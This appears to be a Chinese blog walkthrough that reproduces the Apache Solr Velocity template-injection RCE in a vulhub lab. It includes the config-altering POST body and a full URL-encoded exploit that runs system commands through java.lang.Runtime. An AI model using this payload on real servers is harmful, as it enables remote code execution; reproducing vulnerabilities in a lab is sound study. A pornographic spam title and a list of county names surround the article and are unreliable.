亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Solr Velocity模板注入RCE漏洞復現是怎樣的

發布時間:2021-12-10 15:39:25 來源:億速云 閱讀:235 作者:柒染 欄目:大數據

這期內容當中小編將會給大家帶來有關Apache Solr Velocity模板注入RCE漏洞復現是怎樣的,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。


0x00 簡介


Solr是一個獨立的企業級搜索應用服務器,它對外提供類似于Web-service的API接口。用戶可以通過http請求,向搜索引擎服務器提交一定格式的XML文件,生成索引;也可以通過Http Get操作提出查找請求,并得到XML格式的返回結果。

0x01 漏洞概述


該漏洞的產生是由于兩方面的原因:
當攻擊者可以直接訪問Solr控制臺時,可以通過發送類似/節點名/config的POST請求對該節點的配置文件做更改。
Apache Solr默認集成VelocityResponseWriter插件,在該插件的初始化參數中的params.resource.loader.enabled這個選項是用來控制是否允許參數資源加載器在Solr請求參數中指定模版,默認設置是false。  
 
 當設置params.resource.loader.enabled為true時,將允許用戶通過設置請求中的參數來指定相關資源的加載,這也就意味著攻擊者可以通過構造一個具有威脅的攻擊請求,在服務器上進行命令執行。(來自360CERT

0x02 影響范圍


Apache Solr 5.x - 8.2.0,存在config API版本

0x03 環境搭建


在線環境:

轉發本文到朋友圈,截圖發至公眾號

自行搭建:

使用vulhub中CVE-2019-0193的環境進行搭建

啟動vulhub環境:

git clone https://github.com/vulhub/vulhub.gitcd vulhub/solr/CVE-2019-0193docker-compose up -d

創建名為test的Core:

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

搭建好后默認端口為8983,訪問http://ip:8983 即可

Apache Solr Velocity模板注入RCE漏洞復現是怎樣的

0x04 漏洞利用


利用前提:攻擊者需要知道Solr服務中Core的名稱才能執行攻擊

Apache Solr Velocity模板注入RCE漏洞復現是怎樣的

如上圖所示的這個名稱就是Core的名稱

直接構造POST請求,在/solr/test/config目錄POST以下數據(修改Core的配置)


{  "update-queryresponsewriter": {    "startup": "lazy",    "name": "velocity",    "class": "solr.VelocityResponseWriter",    "template.base.dir": "",    "solr.resource.loader.enabled": "true",    "params.resource.loader.enabled": "true"  }}

Apache Solr Velocity模板注入RCE漏洞復現是怎樣的

然后使用公開的exp發送請求

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

即可成功執行命令

Apache Solr Velocity模板注入RCE漏洞復現是怎樣的

上述就是小編為大家分享的Apache Solr Velocity模板注入RCE漏洞復現是怎樣的了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

兴安县| 苏州市| 文安县| 铜山县| 莆田市| 黔西| 鄂州市| 宜兰县| 上林县| 清河县| 临高县| 云龙县| 白河县| 治多县| 涟源市| 日土县| 丹阳市| 颍上县| 桃源县| 成武县| 保康县| 嵊泗县| 双城市| 石景山区| 铁岭市| 黔西| 垫江县| 铜鼓县| 曲阳县| 方山县| 永寿县| 平潭县| 洪雅县| 彰武县| 中山市| 平泉县| 邛崃市| 南投市| 柳河县| 北流市| 都江堰市|